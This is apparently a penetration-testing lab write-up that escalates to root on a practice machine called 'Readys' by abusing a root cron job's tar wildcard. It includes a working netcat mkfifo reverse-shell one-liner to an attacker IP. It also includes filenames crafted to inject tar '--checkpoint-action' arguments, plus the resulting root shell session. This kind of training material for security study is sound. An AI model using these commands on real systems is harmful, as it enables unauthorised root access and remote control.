InfoSec LAB

Readys_Privilege_Escalation

Created: 2 min read

Wildcard with tar

The Bash script that the root cronjob process is executing at every 3rd minute is a backup script that uses tar to archive the web root directory, /var/www/html. The issue arises as there is a wildcard bit at the end of command.

According to GTFOBins, --checkpoint=1 --checkpoint-action=exec=/bin/sh flags can be appended to get code execution

An online resource also revealed the tar’s wildcard exploit technique

pe.sh

alice@readys:/var/www/html$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.218 1234 >/tmp/f' > /var/www/html/pe.sh ; chmod 755 /var/www/html/pe.sh

First, I will create a Bash reverse shell script in the web root directory and make it executable

flag files

alice@readys:/var/www/html$ echo "" > '--checkpoint=1'
alice@readys:/var/www/html$ echo "" > '--checkpoint-action=exec=sh pe.sh'

Then I will create 2 files; --checkpoint=1 and --checkpoint-action=exec=sh pe.sh

Execution Flow

The flag files as well as the reverse shell script are successfully placed to the web root directory; /var/www/html

tar -cf /opt/backups/website.tar * --checkpoint=1 --checkpoint-action=exec=sh pe.sh

The tar command in the /usr/local/bin/backup.sh file will interpret this way

Shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 52966
bash: cannot set terminal process group (14384): Inappropriate ioctl for device
bash: no job control in this shell
root@readys:/var/www/html# whoami
whoami
root
root@readys:/var/www/html# hostname
hostname
readys
root@readys:/var/www/html# ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.166  netmask 255.255.255.0  broadcast 192.168.154.255
        inet6 fe80::250:56ff:fe9e:6966  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:69:66  txqueuelen 1000  (Ethernet)
        RX packets 72550  bytes 6073447 (5.7 MiB)
        RX errors 0  dropped 504  overruns 0  frame 0
        TX packets 57875  bytes 7961071 (7.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 45  bytes 4582 (4.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 45  bytes 4582 (4.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System level compromise

Interactive Graph View

Backlinks